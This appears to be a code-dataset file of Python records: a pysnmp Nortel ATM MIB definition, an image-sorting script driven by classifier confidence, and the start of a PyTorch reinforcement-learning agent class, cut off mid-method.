6, 1, 4, 1, 562, 36, 2, 1, 114, 96, 7, 40, 1, 2), Counter32()).setMaxAccess(\"readonly\")\nif mibBuilder.loadTexts: mscAtmIfPnniEbrTotalPathOptimizations.setStatus('mandatory')\natmEbrGroup = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1))\natmEbrGroupCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 
1))\natmEbrGroupCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3))\natmEbrGroupCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 1, 1, 3, 2))\natmEbrCapabilities = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3))\natmEbrCapabilitiesCA = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1))\natmEbrCapabilitiesCA02 = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3))\natmEbrCapabilitiesCA02A = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 2, 159, 3, 1, 3, 2))\nmibBuilder.exportSymbols(\"Nortel-MsCarrier-MscPassport-AtmEbrMIB\", mscAtmIfVptPnniEbr=mscAtmIfVptPnniEbr, atmEbrGroupCA=atmEbrGroupCA, mscAtmIfUniEbrTotalConnectionRecoveries=mscAtmIfUniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrComponentName=mscAtmIfPnniEbrComponentName, mscAtmIfVptPnniEbrProvEntry=mscAtmIfVptPnniEbrProvEntry, mscAtmIfVptVccEbrInfoTotalPathOptimizations=mscAtmIfVptVccEbrInfoTotalPathOptimizations, mscAtmIfIispEbrOperTable=mscAtmIfIispEbrOperTable, mscAtmIfPnniEbrStatsTable=mscAtmIfPnniEbrStatsTable, atmEbrGroup=atmEbrGroup, mscAtmIfUniEbrConnectionRecovery=mscAtmIfUniEbrConnectionRecovery, mscAtmIfVptIispEbrOperEntry=mscAtmIfVptIispEbrOperEntry, mscAtmIfVptUniEbrTotalPathOptimizations=mscAtmIfVptUniEbrTotalPathOptimizations, mscAtmIfVptVccSrcEbrOvIndex=mscAtmIfVptVccSrcEbrOvIndex, mscAtmIfUniEbr=mscAtmIfUniEbr, mscAtmIfVptUniEbrPathOptimization=mscAtmIfVptUniEbrPathOptimization, mscAtmIfUniEbrStatsEntry=mscAtmIfUniEbrStatsEntry, mscAtmIfVpcEbrInfoStorageType=mscAtmIfVpcEbrInfoStorageType, mscAtmIfVptIispEbrRowStatus=mscAtmIfVptIispEbrRowStatus, mscAtmIfPnniEbrProvTable=mscAtmIfPnniEbrProvTable, mscAtmIfVptPnniEbrSubscribedConnections=mscAtmIfVptPnniEbrSubscribedConnections, mscAtmIfVccEbrInfoTotalPathOptimizations=mscAtmIfVccEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbrStatsTable=mscAtmIfVptIispEbrStatsTable, mscAtmIfVptUniEbrProvEntry=mscAtmIfVptUniEbrProvEntry, 
mscAtmIfVptPnniEbrEligibleRecoveredConnections=mscAtmIfVptPnniEbrEligibleRecoveredConnections, mscAtmIfVccEbrInfoComponentName=mscAtmIfVccEbrInfoComponentName, mscAtmIfVccSrcEbrOvRowStatusEntry=mscAtmIfVccSrcEbrOvRowStatusEntry, mscAtmIfPnniEbrIndex=mscAtmIfPnniEbrIndex, mscAtmIfVpcSrcEbrOvStorageType=mscAtmIfVpcSrcEbrOvStorageType, mscAtmIfIispEbrRowStatusTable=mscAtmIfIispEbrRowStatusTable, mscAtmIfVptPnniEbrPathOptimization=mscAtmIfVptPnniEbrPathOptimization, mscAtmIfIispEbrProvEntry=mscAtmIfIispEbrProvEntry, mscAtmIfVccEbrInfoRowStatusEntry=mscAtmIfVccEbrInfoRowStatusEntry, mscAtmIfVptIispEbrStorageType=mscAtmIfVptIispEbrStorageType, mscAtmIfVptPnniEbrStatsEntry=mscAtmIfVptPnniEbrStatsEntry, mscAtmIfVptVccEbrInfoIndex=mscAtmIfVptVccEbrInfoIndex, mscAtmIfPnniEbrTotalConnectionRecoveries=mscAtmIfPnniEbrTotalConnectionRecoveries, mscAtmIfVptVccEbrInfoOperTable=mscAtmIfVptVccEbrInfoOperTable, mscAtmIfPnniEbrEligibleRecoveredConnections=mscAtmIfPnniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoRecoverySubscribed=mscAtmIfVpcEbrInfoRecoverySubscribed, mscAtmIfVptVccSrcEbrOvProvTable=mscAtmIfVptVccSrcEbrOvProvTable, mscAtmIfVptVccEbrInfoConnectionRecovered=mscAtmIfVptVccEbrInfoConnectionRecovered, mscAtmIfVptIispEbrComponentName=mscAtmIfVptIispEbrComponentName, mscAtmIfVptUniEbrComponentName=mscAtmIfVptUniEbrComponentName, mscAtmIfVptVccEbrInfoRowStatusEntry=mscAtmIfVptVccEbrInfoRowStatusEntry, mscAtmIfIispEbrComponentName=mscAtmIfIispEbrComponentName, mscAtmIfPnniEbrOperEntry=mscAtmIfPnniEbrOperEntry, mscAtmIfVptIispEbrTotalPathOptimizations=mscAtmIfVptIispEbrTotalPathOptimizations, mscAtmIfVccEbrInfo=mscAtmIfVccEbrInfo, mscAtmIfVptUniEbrIndex=mscAtmIfVptUniEbrIndex, mscAtmIfVptUniEbrIneligibleRecoveredConnections=mscAtmIfVptUniEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02=atmEbrCapabilitiesCA02, mscAtmIfVptUniEbrRowStatusTable=mscAtmIfVptUniEbrRowStatusTable, mscAtmIfVptVccEbrInfoRowStatusTable=mscAtmIfVptVccEbrInfoRowStatusTable, 
mscAtmIfVptIispEbrProvTable=mscAtmIfVptIispEbrProvTable, mscAtmIfVpcSrcEbrOvOptimizationSubscribed=mscAtmIfVpcSrcEbrOvOptimizationSubscribed, mscAtmIfIispEbrTotalPathOptimizations=mscAtmIfIispEbrTotalPathOptimizations, mscAtmIfVccSrcEbrOvComponentName=mscAtmIfVccSrcEbrOvComponentName, mscAtmIfVccSrcEbrOvOptimizationSubscribed=mscAtmIfVccSrcEbrOvOptimizationSubscribed, mscAtmIfUniEbrOperTable=mscAtmIfUniEbrOperTable, mscAtmIfIispEbrStorageType=mscAtmIfIispEbrStorageType, mscAtmIfVptVccSrcEbrOv=mscAtmIfVptVccSrcEbrOv, mscAtmIfIispEbrStatsTable=mscAtmIfIispEbrStatsTable, mscAtmIfUniEbrSubscribedConnections=mscAtmIfUniEbrSubscribedConnections, mscAtmIfUniEbrRowStatusTable=mscAtmIfUniEbrRowStatusTable, mscAtmIfIispEbrStatsEntry=mscAtmIfIispEbrStatsEntry, mscAtmIfVptVccEbrInfoOperEntry=mscAtmIfVptVccEbrInfoOperEntry, mscAtmIfIispEbrRowStatusEntry=mscAtmIfIispEbrRowStatusEntry, mscAtmIfVptIispEbrIneligibleRecoveredConnections=mscAtmIfVptIispEbrIneligibleRecoveredConnections, atmEbrCapabilitiesCA02A=atmEbrCapabilitiesCA02A, mscAtmIfVptVccEbrInfoOptimizationSubscribed=mscAtmIfVptVccEbrInfoOptimizationSubscribed, mscAtmIfVccEbrInfoIndex=mscAtmIfVccEbrInfoIndex, mscAtmIfIispEbrPathOptimization=mscAtmIfIispEbrPathOptimization, mscAtmIfPnniEbrRowStatusEntry=mscAtmIfPnniEbrRowStatusEntry, mscAtmIfVptIispEbrSubscribedConnections=mscAtmIfVptIispEbrSubscribedConnections, mscAtmIfUniEbrStatsTable=mscAtmIfUniEbrStatsTable, mscAtmIfVptUniEbrStatsTable=mscAtmIfVptUniEbrStatsTable, mscAtmIfVptPnniEbrRowStatus=mscAtmIfVptPnniEbrRowStatus, mscAtmIfVptUniEbrProvTable=mscAtmIfVptUniEbrProvTable, mscAtmIfVptUniEbrOperEntry=mscAtmIfVptUniEbrOperEntry, mscAtmIfVccEbrInfoRecoverySubscribed=mscAtmIfVccEbrInfoRecoverySubscribed, mscAtmIfVpcEbrInfo=mscAtmIfVpcEbrInfo, mscAtmIfPnniEbrIneligibleRecoveredConnections=mscAtmIfPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcSrcEbrOvRowStatusTable=mscAtmIfVpcSrcEbrOvRowStatusTable, 
mscAtmIfVptPnniEbrIneligibleRecoveredConnections=mscAtmIfVptPnniEbrIneligibleRecoveredConnections, mscAtmIfVpcEbrInfoConnectionRecovered=mscAtmIfVpcEbrInfoConnectionRecovered, mscAtmIfVccSrcEbrOvProvTable=mscAtmIfVccSrcEbrOvProvTable, mscAtmIfVccEbrInfoRowStatusTable=mscAtmIfVccEbrInfoRowStatusTable, mscAtmIfVccEbrInfoStorageType=mscAtmIfVccEbrInfoStorageType, mscAtmIfVpcEbrInfoTotalPathOptimizations=mscAtmIfVpcEbrInfoTotalPathOptimizations, mscAtmIfVptIispEbr=mscAtmIfVptIispEbr, mscAtmIfVpcEbrInfoRowStatus=mscAtmIfVpcEbrInfoRowStatus, mscAtmIfVccSrcEbrOvRowStatusTable=mscAtmIfVccSrcEbrOvRowStatusTable, mscAtmIfIispEbrConnectionRecovery=mscAtmIfIispEbrConnectionRecovery, mscAtmIfVccSrcEbrOvProvEntry=mscAtmIfVccSrcEbrOvProvEntry, mscAtmIfUniEbrIndex=mscAtmIfUniEbrIndex, mscAtmIfVptUniEbrTotalConnectionRecoveries=mscAtmIfVptUniEbrTotalConnectionRecoveries, mscAtmIfVpcEbrInfoTotalConnectionRecoveries=mscAtmIfVpcEbrInfoTotalConnectionRecoveries, mscAtmIfVptVccSrcEbrOvRowStatusEntry=mscAtmIfVptVccSrcEbrOvRowStatusEntry, mscAtmIfIispEbrTotalConnectionRecoveries=mscAtmIfIispEbrTotalConnectionRecoveries, mscAtmIfIispEbrRowStatus=mscAtmIfIispEbrRowStatus, mscAtmIfVpcSrcEbrOvProvTable=mscAtmIfVpcSrcEbrOvProvTable, mscAtmIfVptUniEbrRowStatus=mscAtmIfVptUniEbrRowStatus, mscAtmIfPnniEbrRowStatusTable=mscAtmIfPnniEbrRowStatusTable, mscAtmIfPnniEbrStatsEntry=mscAtmIfPnniEbrStatsEntry, mscAtmIfVpcSrcEbrOvIndex=mscAtmIfVpcSrcEbrOvIndex, mscAtmIfVpcEbrInfoComponentName=mscAtmIfVpcEbrInfoComponentName, mscAtmIfVptIispEbrPathOptimization=mscAtmIfVptIispEbrPathOptimization, mscAtmIfVpcSrcEbrOvRowStatus=mscAtmIfVpcSrcEbrOvRowStatus, mscAtmIfVpcEbrInfoRowStatusEntry=mscAtmIfVpcEbrInfoRowStatusEntry, mscAtmIfVptPnniEbrOperEntry=mscAtmIfVptPnniEbrOperEntry, mscAtmIfIispEbrSubscribedConnections=mscAtmIfIispEbrSubscribedConnections, mscAtmIfVccSrcEbrOv=mscAtmIfVccSrcEbrOv, mscAtmIfVptIispEbrEligibleRecoveredConnections=mscAtmIfVptIispEbrEligibleRecoveredConnections, 
mscAtmIfUniEbrProvEntry=mscAtmIfUniEbrProvEntry, mscAtmIfVpcEbrInfoRowStatusTable=mscAtmIfVpcEbrInfoRowStatusTable, mscAtmIfVptPnniEbrComponentName=mscAtmIfVptPnniEbrComponentName, mscAtmIfVptPnniEbrConnectionRecovery=mscAtmIfVptPnniEbrConnectionRecovery, mscAtmIfVptVccSrcEbrOvRowStatus=mscAtmIfVptVccSrcEbrOvRowStatus, mscAtmIfVptIispEbrRowStatusTable=mscAtmIfVptIispEbrRowStatusTable, mscAtmIfVptPnniEbrStorageType=mscAtmIfVptPnniEbrStorageType, mscAtmIfVptVccEbrInfoStorageType=mscAtmIfVptVccEbrInfoStorageType, mscAtmIfIispEbr=mscAtmIfIispEbr, mscAtmIfVccEbrInfoOperEntry=mscAtmIfVccEbrInfoOperEntry, mscAtmIfVptPnniEbrTotalConnectionRecoveries=mscAtmIfVptPnniEbrTotalConnectionRecoveries, mscAtmIfPnniEbrRowStatus=mscAtmIfPnniEbrRowStatus, mscAtmIfVpcSrcEbrOvProvEntry=mscAtmIfVpcSrcEbrOvProvEntry, mscAtmIfVccEbrInfoRowStatus=mscAtmIfVccEbrInfoRowStatus, mscAtmIfVptIispEbrIndex=mscAtmIfVptIispEbrIndex, mscAtmIfVpcEbrInfoOperEntry=mscAtmIfVpcEbrInfoOperEntry, mscAtmIfVptIispEbrOperTable=mscAtmIfVptIispEbrOperTable, mscAtmIfUniEbrProvTable=mscAtmIfUniEbrProvTable, mscAtmIfPnniEbrPathOptimization=mscAtmIfPnniEbrPathOptimization, mscAtmIfVpcEbrInfoStatsTable=mscAtmIfVpcEbrInfoStatsTable, mscAtmIfVccSrcEbrOvIndex=mscAtmIfVccSrcEbrOvIndex, mscAtmIfPnniEbrSubscribedConnections=mscAtmIfPnniEbrSubscribedConnections, mscAtmIfVptIispEbrRowStatusEntry=mscAtmIfVptIispEbrRowStatusEntry, mscAtmIfIispEbrProvTable=mscAtmIfIispEbrProvTable, mscAtmIfVptVccSrcEbrOvComponentName=mscAtmIfVptVccSrcEbrOvComponentName, mscAtmIfVptUniEbrConnectionRecovery=mscAtmIfVptUniEbrConnectionRecovery, mscAtmIfVccSrcEbrOvStorageType=mscAtmIfVccSrcEbrOvStorageType, mscAtmIfVpcSrcEbrOv=mscAtmIfVpcSrcEbrOv, mscAtmIfVptPnniEbrRowStatusTable=mscAtmIfVptPnniEbrRowStatusTable, mscAtmIfUniEbrEligibleRecoveredConnections=mscAtmIfUniEbrEligibleRecoveredConnections, mscAtmIfVptUniEbrRowStatusEntry=mscAtmIfVptUniEbrRowStatusEntry, mscAtmIfVccSrcEbrOvRowStatus=mscAtmIfVccSrcEbrOvRowStatus, 
mscAtmIfIispEbrEligibleRecoveredConnections=mscAtmIfIispEbrEligibleRecoveredConnections, mscAtmIfPnniEbrOperTable=mscAtmIfPnniEbrOperTable, mscAtmIfVpcEbrInfoOperTable=mscAtmIfVpcEbrInfoOperTable, mscAtmIfVpcEbrInfoStatsEntry=mscAtmIfVpcEbrInfoStatsEntry, mscAtmIfVptUniEbrStorageType=mscAtmIfVptUniEbrStorageType, mscAtmIfVccEbrInfoStatsTable=mscAtmIfVccEbrInfoStatsTable, mscAtmIfVptVccEbrInfoStatsTable=mscAtmIfVptVccEbrInfoStatsTable, mscAtmIfUniEbrPathOptimization=mscAtmIfUniEbrPathOptimization, mscAtmIfVptPnniEbrStatsTable=mscAtmIfVptPnniEbrStatsTable, mscAtmIfVptUniEbrSubscribedConnections=mscAtmIfVptUniEbrSubscribedConnections, mscAtmIfVptVccEbrInfo=mscAtmIfVptVccEbrInfo, mscAtmIfPnniEbrConnectionRecovery=mscAtmIfPnniEbrConnectionRecovery, mscAtmIfVccEbrInfoConnectionRecovered=mscAtmIfVccEbrInfoConnectionRecovered, mscAtmIfVccEbrInfoStatsEntry=mscAtmIfVccEbrInfoStatsEntry, mscAtmIfVptVccEbrInfoTotalConnectionRecoveries=mscAtmIfVptVccEbrInfoTotalConnectionRecoveries, mscAtmIfUniEbrStorageType=mscAtmIfUniEbrStorageType, mscAtmIfVptUniEbrStatsEntry=mscAtmIfVptUniEbrStatsEntry, mscAtmIfVptPnniEbrProvTable=mscAtmIfVptPnniEbrProvTable, mscAtmIfVccSrcEbrOvRecoverySubscribed=mscAtmIfVccSrcEbrOvRecoverySubscribed, atmEbrCapabilities=atmEbrCapabilities, mscAtmIfUniEbrComponentName=mscAtmIfUniEbrComponentName, mscAtmIfPnniEbrTotalPathOptimizations=mscAtmIfPnniEbrTotalPathOptimizations, mscAtmIfUniEbrIneligibleRecoveredConnections=mscAtmIfUniEbrIneligibleRecoveredConnections, mscAtmIfPnniEbr=mscAtmIfPnniEbr, mscAtmIfVptIispEbrProvEntry=mscAtmIfVptIispEbrProvEntry, mscAtmIfUniEbrRowStatusEntry=mscAtmIfUniEbrRowStatusEntry, mscAtmIfVptPnniEbrRowStatusEntry=mscAtmIfVptPnniEbrRowStatusEntry, mscAtmIfVpcEbrInfoIndex=mscAtmIfVpcEbrInfoIndex, mscAtmIfVptVccSrcEbrOvProvEntry=mscAtmIfVptVccSrcEbrOvProvEntry, mscAtmIfVccEbrInfoOperTable=mscAtmIfVccEbrInfoOperTable, mscAtmIfVptVccEbrInfoStatsEntry=mscAtmIfVptVccEbrInfoStatsEntry, atmEbrGroupCA02A=atmEbrGroupCA02A, 
mscAtmIfVccEbrInfoOptimizationSubscribed=mscAtmIfVccEbrInfoOptimizationSubscribed, mscAtmIfVptVccSrcEbrOvRowStatusTable=mscAtmIfVptVccSrcEbrOvRowStatusTable, atmEbrMIB=atmEbrMIB, mscAtmIfVptVccEbrInfoRecoverySubscribed=mscAtmIfVptVccEbrInfoRecoverySubscribed, mscAtmIfVpcSrcEbrOvRowStatusEntry=mscAtmIfVpcSrcEbrOvRowStatusEntry, mscAtmIfVptVccEbrInfoRowStatus=mscAtmIfVptVccEbrInfoRowStatus, mscAtmIfVptIispEbrStatsEntry=mscAtmIfVptIispEbrStatsEntry, mscAtmIfPnniEbrStorageType=mscAtmIfPnniEbrStorageType, mscAtmIfPnniEbrProvEntry=mscAtmIfPnniEbrProvEntry, mscAtmIfVptUniEbrOperTable=mscAtmIfVptUniEbrOperTable, mscAtmIfIispEbrIneligibleRecoveredConnections=mscAtmIfIispEbrIneligibleRecoveredConnections, mscAtmIfVptIispEbrConnectionRecovery=mscAtmIfVptIispEbrConnectionRecovery, mscAtmIfVptUniEbr=mscAtmIfVptUniEbr, atmEbrGroupCA02=atmEbrGroupCA02, mscAtmIfVptIispEbrTotalConnectionRecoveries=mscAtmIfVptIispEbrTotalConnectionRecoveries, mscAtmIfUniEbrTotalPathOptimizations=mscAtmIfUniEbrTotalPathOptimizations, mscAtmIfVpcSrcEbrOvRecoverySubscribed=mscAtmIfVpcSrcEbrOvRecoverySubscribed, mscAtmIfVptPnniEbrOperTable=mscAtmIfVptPnniEbrOperTable, mscAtmIfVptVccSrcEbrOvOptimizationSubscribed=mscAtmIfVptVccSrcEbrOvOptimizationSubscribed, mscAtmIfVptUniEbrEligibleRecoveredConnections=mscAtmIfVptUniEbrEligibleRecoveredConnections, mscAtmIfVpcEbrInfoOptimizationSubscribed=mscAtmIfVpcEbrInfoOptimizationSubscribed, mscAtmIfVptPnniEbrIndex=mscAtmIfVptPnniEbrIndex, mscAtmIfUniEbrRowStatus=mscAtmIfUniEbrRowStatus, mscAtmIfUniEbrOperEntry=mscAtmIfUniEbrOperEntry, mscAtmIfVptVccSrcEbrOvStorageType=mscAtmIfVptVccSrcEbrOvStorageType, mscAtmIfVptPnniEbrTotalPathOptimizations=mscAtmIfVptPnniEbrTotalPathOptimizations, mscAtmIfVpcSrcEbrOvComponentName=mscAtmIfVpcSrcEbrOvComponentName, mscAtmIfVptVccEbrInfoComponentName=mscAtmIfVptVccEbrInfoComponentName, mscAtmIfIispEbrOperEntry=mscAtmIfIispEbrOperEntry, mscAtmIfVptVccSrcEbrOvRecoverySubscribed=mscAtmIfVptVccSrcEbrOvRecoverySubscribed, 
mscAtmIfIispEbrIndex=mscAtmIfIispEbrIndex, atmEbrCapabilitiesCA=atmEbrCapabilitiesCA, mscAtmIfVccEbrInfoTotalConnectionRecoveries=mscAtmIfVccEbrInfoTotalConnectionRecoveries)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# -*-coding:utf-8-*-
import os
import time
import shutil
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--dir', type=str, required=True)
parser.add_argument('--task', type=str, required=True)
args = parser.parse_args()
if not os.path.exists(args.dir):
print("dir:{} not exist".format(args.dir))
exit(0)
result_dir = args.task
if not os.path.exists(result_dir):
os.makedirs(result_dir)
class_images = {}
dirs = ['same.high', 'same.low', 'diff.high', 'diff.low']
check_info = os.path.join(args.dir, "info.csv")
if not os.path.exists(check_info):
print("file:{} not exist".format(check_info))
check_list = {}
start_t = time.time()
with open(check_info, "r") as f:
line_str = f.readline()
# skip first line
line_str = f.readline()
while line_str:
line_str = line_str.strip()
# label_id: id labeled in dataset
# class_id: id predict
file_name, label_id, class_id, class_acc = line_str.split(",")
class_acc = float(class_acc)
if file_name == '327_20180115133328530498_00_004_5.jpg':
print("got")
init_id = class_id
if label_id == class_id:
if class_acc < 0.8:
init_id = label_id
_dir = 'same.low'
elif class_acc < 0.95:
_dir = 'same.high'
else:
line_str = f.readline()
continue
else:
if class_acc < 0.8:
init_id = label_id
_dir = 'diff.low'
else:
_dir = 'diff.high'
dest_dir = os.path.join(result_dir, _dir)
if not os.path.exists(dest_dir):
os.makedirs(dest_dir)
if _dir not in check_list:
check_list[_dir] = []
task_str = "{},{}\n".format(file_name, init_id)
check_list[_dir].append(task_str)
dest_path = os.path.join(dest_dir, file_name)
file_path = os.path.join(args.dir, _dir, class_id, file_name)
shutil.copy(file_path, dest_path)
line_str = f.readline()
for _dir, _dir_list in check_list.items():
csv_path = os.path.join(result_dir, _dir, "ImageType.csv")
with open(csv_path, "w") as f:
for _str in _dir_list:
f.write(_str)
end_t = time.time()
print("finish in {} s".format(end_t - start_t))
|
normal
|
{
"blob_id": "dc3a3f5675860792ecfa7dcd5180402d89b669b1",
"index": 8254,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dir', type=str, required=True)\n parser.add_argument('--task', type=str, required=True)\n args = parser.parse_args()\n if not os.path.exists(args.dir):\n print('dir:{} not exist'.format(args.dir))\n exit(0)\n result_dir = args.task\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n class_images = {}\n dirs = ['same.high', 'same.low', 'diff.high', 'diff.low']\n check_info = os.path.join(args.dir, 'info.csv')\n if not os.path.exists(check_info):\n print('file:{} not exist'.format(check_info))\n check_list = {}\n start_t = time.time()\n with open(check_info, 'r') as f:\n line_str = f.readline()\n line_str = f.readline()\n while line_str:\n line_str = line_str.strip()\n file_name, label_id, class_id, class_acc = line_str.split(',')\n class_acc = float(class_acc)\n if file_name == '327_20180115133328530498_00_004_5.jpg':\n print('got')\n init_id = class_id\n if label_id == class_id:\n if class_acc < 0.8:\n init_id = label_id\n _dir = 'same.low'\n elif class_acc < 0.95:\n _dir = 'same.high'\n else:\n line_str = f.readline()\n continue\n elif class_acc < 0.8:\n init_id = label_id\n _dir = 'diff.low'\n else:\n _dir = 'diff.high'\n dest_dir = os.path.join(result_dir, _dir)\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n if _dir not in check_list:\n check_list[_dir] = []\n task_str = '{},{}\\n'.format(file_name, init_id)\n check_list[_dir].append(task_str)\n dest_path = os.path.join(dest_dir, file_name)\n file_path = os.path.join(args.dir, _dir, class_id, file_name)\n shutil.copy(file_path, dest_path)\n line_str = f.readline()\n for _dir, _dir_list in check_list.items():\n csv_path = os.path.join(result_dir, _dir, 'ImageType.csv')\n with open(csv_path, 'w') as f:\n for _str in _dir_list:\n f.write(_str)\n end_t = time.time()\n print('finish in {} s'.format(end_t - start_t))\n",
"step-3": "import os\nimport time\nimport shutil\nimport argparse\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dir', type=str, required=True)\n parser.add_argument('--task', type=str, required=True)\n args = parser.parse_args()\n if not os.path.exists(args.dir):\n print('dir:{} not exist'.format(args.dir))\n exit(0)\n result_dir = args.task\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n class_images = {}\n dirs = ['same.high', 'same.low', 'diff.high', 'diff.low']\n check_info = os.path.join(args.dir, 'info.csv')\n if not os.path.exists(check_info):\n print('file:{} not exist'.format(check_info))\n check_list = {}\n start_t = time.time()\n with open(check_info, 'r') as f:\n line_str = f.readline()\n line_str = f.readline()\n while line_str:\n line_str = line_str.strip()\n file_name, label_id, class_id, class_acc = line_str.split(',')\n class_acc = float(class_acc)\n if file_name == '327_20180115133328530498_00_004_5.jpg':\n print('got')\n init_id = class_id\n if label_id == class_id:\n if class_acc < 0.8:\n init_id = label_id\n _dir = 'same.low'\n elif class_acc < 0.95:\n _dir = 'same.high'\n else:\n line_str = f.readline()\n continue\n elif class_acc < 0.8:\n init_id = label_id\n _dir = 'diff.low'\n else:\n _dir = 'diff.high'\n dest_dir = os.path.join(result_dir, _dir)\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n if _dir not in check_list:\n check_list[_dir] = []\n task_str = '{},{}\\n'.format(file_name, init_id)\n check_list[_dir].append(task_str)\n dest_path = os.path.join(dest_dir, file_name)\n file_path = os.path.join(args.dir, _dir, class_id, file_name)\n shutil.copy(file_path, dest_path)\n line_str = f.readline()\n for _dir, _dir_list in check_list.items():\n csv_path = os.path.join(result_dir, _dir, 'ImageType.csv')\n with open(csv_path, 'w') as f:\n for _str in _dir_list:\n f.write(_str)\n end_t = time.time()\n print('finish in {} s'.format(end_t - start_t))\n",
"step-4": "# -*-coding:utf-8-*-\n\nimport os\nimport time\nimport shutil\nimport argparse\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--dir', type=str, required=True)\n parser.add_argument('--task', type=str, required=True)\n args = parser.parse_args()\n\n if not os.path.exists(args.dir):\n print(\"dir:{} not exist\".format(args.dir))\n exit(0)\n\n result_dir = args.task\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n\n class_images = {}\n dirs = ['same.high', 'same.low', 'diff.high', 'diff.low']\n\n check_info = os.path.join(args.dir, \"info.csv\")\n if not os.path.exists(check_info):\n print(\"file:{} not exist\".format(check_info))\n\n check_list = {}\n\n start_t = time.time()\n\n with open(check_info, \"r\") as f:\n line_str = f.readline()\n # skip first line\n line_str = f.readline()\n while line_str:\n line_str = line_str.strip()\n\n # label_id: id labeled in dataset\n # class_id: id predict\n file_name, label_id, class_id, class_acc = line_str.split(\",\")\n class_acc = float(class_acc)\n\n if file_name == '327_20180115133328530498_00_004_5.jpg':\n print(\"got\")\n\n init_id = class_id\n if label_id == class_id:\n if class_acc < 0.8:\n init_id = label_id\n _dir = 'same.low'\n elif class_acc < 0.95:\n _dir = 'same.high'\n else:\n line_str = f.readline()\n continue\n else:\n if class_acc < 0.8:\n init_id = label_id\n _dir = 'diff.low'\n else:\n _dir = 'diff.high'\n\n dest_dir = os.path.join(result_dir, _dir)\n if not os.path.exists(dest_dir):\n os.makedirs(dest_dir)\n\n if _dir not in check_list:\n check_list[_dir] = []\n\n task_str = \"{},{}\\n\".format(file_name, init_id)\n check_list[_dir].append(task_str)\n\n dest_path = os.path.join(dest_dir, file_name)\n file_path = os.path.join(args.dir, _dir, class_id, file_name)\n\n shutil.copy(file_path, dest_path)\n\n line_str = f.readline()\n\n for _dir, _dir_list in check_list.items():\n csv_path = os.path.join(result_dir, _dir, \"ImageType.csv\")\n 
with open(csv_path, \"w\") as f:\n for _str in _dir_list:\n f.write(_str)\n\n end_t = time.time()\n print(\"finish in {} s\".format(end_t - start_t))\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import logging
import time
import random
import pickle
import os
from sys import maxsize
import torch
from tensorboardX import SummaryWriter
from baselines.common.schedules import LinearSchedule
from abp.utils import clear_summary_path
from abp.models.feature_q_model import feature_q_model
from abp.adaptives.common.prioritized_memory.memory_gqf import ReplayBuffer_decom
import numpy as np
# Shared module logger.
logger = logging.getLogger('root')

# Pick CUDA-backed tensor constructors when a GPU is present, CPU ones otherwise.
use_cuda = torch.cuda.is_available()
_backend = torch.cuda if use_cuda else torch
FloatTensor = _backend.FloatTensor
LongTensor = _backend.LongTensor
IntTensor = _backend.IntTensor
ByteTensor = _backend.ByteTensor
# Default tensor alias used throughout this module.
Tensor = FloatTensor
class SADQ_GQF(object):
"""Adaptive which uses the SADQ algorithm"""
def __init__(self, name, state_length, network_config, reinforce_config, feature_len, combine_decomposed_func, is_sigmoid = False, memory_resotre = True):
super(SADQ_GQF, self).__init__()
self.name = name
#self.choices = choices
self.network_config = network_config
self.reinforce_config = reinforce_config
self.memory = ReplayBuffer_decom(self.reinforce_config.memory_size)
self.learning = True
self.explanation = False
self.state_length = state_length
self.features = 0
self.feature_len = feature_len
# Global
self.steps = 0
self.reward_history = []
self.episode_time_history = []
self.best_reward_mean = -maxsize
self.episode = 0
self.feature_len = feature_len
self.features = None
self.reset()
self.memory_resotre = memory_resotre
reinforce_summary_path = self.reinforce_config.summaries_path + "/" + self.name
if not self.network_config.restore_network:
clear_summary_path(reinforce_summary_path)
else:
self.restore_state()
self.summary = SummaryWriter(log_dir=reinforce_summary_path)
self.eval_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)
self.target_model = feature_q_model(name, state_length, self.feature_len, self.network_config.output_shape, network_config)
# self.target_model.eval_mode()
self.beta_schedule = LinearSchedule(self.reinforce_config.beta_timesteps,
initial_p=self.reinforce_config.beta_initial,
final_p=self.reinforce_config.beta_final)
self.epsilon_schedule = LinearSchedule(self.reinforce_config.epsilon_timesteps,
initial_p=self.reinforce_config.starting_epsilon,
final_p=self.reinforce_config.final_epsilon)
# def __del__(self):
# self.save()
# self.summary.close()
def should_explore(self):
self.epsilon = self.epsilon_schedule.value(self.steps)
self.summary.add_scalar(tag='%s/Epsilon' % self.name,
scalar_value=self.epsilon,
global_step=self.steps)
return random.random() < self.epsilon
def predict(self, state, isGreedy = False, is_random = False):
if self.learning:
self.steps += 1
# add to experience
if self.previous_state is not None and self.learning and self.current_reward is not None:
state_crr = np.unique(state, axis=0)
self.memory.add(self.previous_state,
None,
self.current_reward,
state_crr.reshape(-1, self.state_length), 0,
self.features)
# print("not final : {}".format(self.current_reward) )
# print(0, self.features)
if self.learning and self.should_explore() and not isGreedy:
